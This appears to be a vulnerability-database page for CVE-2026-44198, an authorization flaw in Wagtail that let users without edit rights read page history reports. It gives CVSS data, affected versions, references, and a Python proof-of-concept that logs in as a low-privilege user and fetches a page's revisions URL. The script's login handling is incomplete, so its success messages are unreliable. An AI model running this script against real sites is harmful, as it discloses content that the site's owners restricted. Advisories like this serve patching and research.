CVE-2026-44198

Description

Wagtail is an open source content management system built on Django. Prior to 7.0.7, 7.3.2, and 7.4, a CMS user without the ability to edit a page could still access the history report for the page, potentially resulting in disclosure of sensitive information. This vulnerability is fixed in 7.0.7, 7.3.2, and 7.4.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:* - VULNERABLE

Wagtail < 7.0.7

Wagtail < 7.3.2

Wagtail < 7.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_url = "http://target-wagtail-site.com"
login_url = f"{target_url}/admin/login/"
page_history_url = f"{target_url}/admin/pages/5/revisions/" # Replace 5 with valid page ID

# Low-privilege user credentials
username = "low_priv_user"
password = "password123"

session = requests.Session()

# Step 1: Login to get session cookie
login_payload = {
    "username": username,
    "password": password,
    "csrfmiddlewaretoken": "" # Need to fetch this first in a real scenario
}
# Note: In a real exploit, you must fetch the CSRF token from the login page first.
response = session.post(login_url, data=login_payload)

if response.status_code == 200:
    print("[+] Login successful")

    # Step 2: Access page history without edit permission
    history_response = session.get(page_history_url)

    if history_response.status_code == 200:
        print("[+] Successfully accessed page history!")
        print("[+] Content snippet:")
        print(history_response.text[:500]) # Print first 500 chars
    else:
        print("[-] Failed to access history")
else:
    print("[-] Login failed")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44198
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44198
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44198/
[4] VulDB https://vuldb.com/cve/CVE-2026-44198
[5] https://github.com/wagtail/wagtail/security/advisories/GHSA-c4mr-889m-vgf6

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44198", "sourceIdentifier": "[email protected]", "published": "2026-05-11T16:17:35.057", "lastModified": "2026-05-12T15:58:41.620", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wagtail is an open source content management system built on Django. Prior to 7.0.7, 7.3.2, and 7.4, a CMS user without the ability to edit a page could still access the history report for the page, potentially resulting in disclosure of sensitive information. This vulnerability is fixed in 7.0.7, 7.3.2, and 7.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-280"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.0.7", "matchCriteriaId": "AA54A323-7F77-4D1D-9830-BF8FBE4B5B34"}, {"vulnerable": true, "criteria": "cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.1", "versionEndExcluding": "7.3.2", "matchCriteriaId": "FED1A6D7-1193-485D-B25F-60FCC20A6D6B"}]}]}], "references": [{"url": "https://github.com/wagtail/wagtail/security/advisories/GHSA-c4mr-889m-vgf6", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}